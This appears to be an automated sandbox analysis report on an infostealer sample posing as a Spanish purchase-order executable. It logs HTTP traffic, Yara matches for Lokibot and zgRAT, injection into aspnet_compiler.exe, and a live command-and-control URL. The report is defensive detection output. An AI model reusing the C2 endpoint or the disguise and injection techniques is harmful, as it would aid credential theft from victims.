Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUAhUd8ttVOU9iQmDkVjviHt%2FXF1690rNHiGhdwfbCrcYgX9qWBqhnqrF0%2BHt09zNJl3%2FK1%2Fasm2U4Es%2BWEIyfwDoGFLhnERXNZSKclB%2BV%2FuLd0oh0qHz2J5NvF3EQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adae38c226c3f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1960&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2YVYdYvB9Cb13Q13HoijNG2JbuyfazCk4JFPV1kmQvpO4WkAxyOO4fPGDk1%2FdhjdpqKmDR8RuFr1%2FYbEOJ5OGNlBdhxGTptsYtOfKOQz%2B1jerauTyU3M%2F6Yx%2BWbaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adaea1916e77d-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2687&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2F8Dg55V4vzwndC76cyd2AQMgBj4YbWMhYIa4bISoMztEWeC6XGX%2FQHuUNT3i9qjO9bB3pH8GYDx251YciV8YC6K8PqR4qMI9eksE%2FtLBLOfRY%2BZdRGNvclnJKWi3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adaf36fff3aac-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1141&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=arvzRh4D50zz0cGv9%2Fp%2B65cbO4r9XT4fD8aTYL0lC7SzW9RB66gozn8PE53drTYmJUetbJaDIWvGY%2BLR8BFosj%2B9QX%2BU1xUsMsoXmng%2B02C7nrK11RjLo1znHiXGCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adafa5bf06c28-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1929&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZpP48vVEFaoIJXmJweJdMcqvE32HQne95DJ4%2BpbCorqz19Rdm9FHDeKInDttE5ENIbtztiJFigyEfLTykX7Jo1yXON2Gd0nHrUYH%2BNusi6LJTXSuwysaIqIWt%2BbjQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb045dfbe7df-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2058&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWa4g5hds29eH2hu8idLkFWYdOYJE7ClKfa96z%2BbHnfAUM5dtw2%2FzF%2FIn786%2BtGTFK6YsLkdO4XzbPVTXrxsDjLrDuDrP5LNm3Wpnsvk6rkNzY1ES3h2FITneWSmxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb1a5859e7aa-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1567&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mthHisWz0XpCVOYwRB6iqtkAod4n7LnHPrMwsnF5yo2DlqlDh7Bs4xkcBH4czccZXvNZ0CcLCGAWZmptILSpN0FCYwOP%2FaFRUv6KJCSqc61Q5NqSnrFlvmEs2WPqEQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb25c9bfe9b1-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2032&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dJfa1hiYNLN1jWlhq%2FqZLFUFkOHcKKD%2BBvBDW0pOAmL%2BE0YmUkcrXFRhmmU0vMUgyf41AvGxIGg2VsGSFPciVz64V5bKAlRPXC%2FHTK%2B5vheCwqvDaJ86kfO5R6KMwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb302dbaeb2f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1094&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNqxsd1pUSYqptvMagBIhW9j9rA0LVQyajgvXmU2jWsUPUaK3UyzBM1MSPU10pBUhsnguEel%2FS9Lfc4Xly3DEE0pcm%2BUuqhbA6o4q54gk%2FlRlclmNknMuZ7mQICBFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb481d716b1d-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1373&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:04:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D69zyd2CmaCqyBI00eXhuBCNz1HQRQgyhCJkeShuBfNuQ5%2F8qpc%2BJxTm4qdwsSDjMBFgcuyIioTs7ci0fARwHieEMjUBmW8ebSZ7VKYMgUOaAIxPKxXFuW4oWC%2BaWQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb521f52e9ca-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2231&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:04:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vNYo7VG3OL66n7smhCPctkTkmvWh6szOKNrT0SGzHaDYrAQtqbk6QL4VfOyd1%2B1KQBnoGvzVNfKIVjtOFnSSmSQUZUXvrNbBTiMDWsEHpkTGvW7UQ9xDTiTMMtJuug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb731faa6b51-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:04:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rTIu3Xa9n%2FRNYYgxgBO1owPFBvIZrGWUg%2BEKFWBmKougVFgHZuTwrvrC9AC974qF0bXnRV4%2FKnoCDwrAz73xAd0JYIvMBJ%2BcNFzbk6g%2FT%2BJuBlhngNIuWeh5LOLvzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb79cade474a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2008&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:04:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xMYPnjzitArtv%2BpXSPf1c%2BvhKrzavh9oSC5vxt8Vsn73nAzg48C%2B2Ug3GtAAwizAOLB%2Fq9FtaSU%2FBvVHyzyMJc%2FZ3parcBlPk0ijTuy8dVpp0hmRwkwEI7m18CrVmQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adb836f1fea0a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1220&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: aspnet_compiler.exe, 00000002.00000002.3328760940.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.3328488455.00000000004A0000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/Mine/PWS/fre.php

System Summary

Malicious sample detected (through community Yara rule)

Source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.rPedidodecompra__PO20441__ARIMComponentes.exe.c40000.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3328488455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2115367429.0000000004041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: rPedidodecompra__PO20441__ARIMComponentes.exe PID: 2584, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 6128, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_0040549C		2_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_004029D4		2_2_004029D4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00405B6F appears 42 times

Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2114914524.000000000126E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs rPedidodecompra__PO20441__ARIMComponentes.exe
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115367429.00000000041C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs rPedidodecompra__PO20441__ARIMComponentes.exe
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameBATMAN.dll. vs rPedidodecompra__PO20441__ARIMComponentes.exe
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBATMAN.dll. vs rPedidodecompra__PO20441__ARIMComponentes.exe
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000000.2086513181.0000000000C84000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWindowsFormsApp1.exeB vs rPedidodecompra__PO20441__ARIMComponentes.exe
Source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2116292720.0000000005570000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameResourceAssembly.dllD vs rPedidodecompra__PO20441__ARIMComponentes.exe
Source: rPedidodecompra__PO20441__ARIMComponentes.exe	Binary or memory string: OriginalFilenameWindowsFormsApp1.exeB vs rPedidodecompra__PO20441__ARIMComponentes.exe

Source: rPedidodecompra__PO20441__ARIMComponentes.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: rPedidodecompra__PO20441__ARIMComponentes.exe, type: SAMPLE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.rPedidodecompra__PO20441__ARIMComponentes.exe.4045570.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
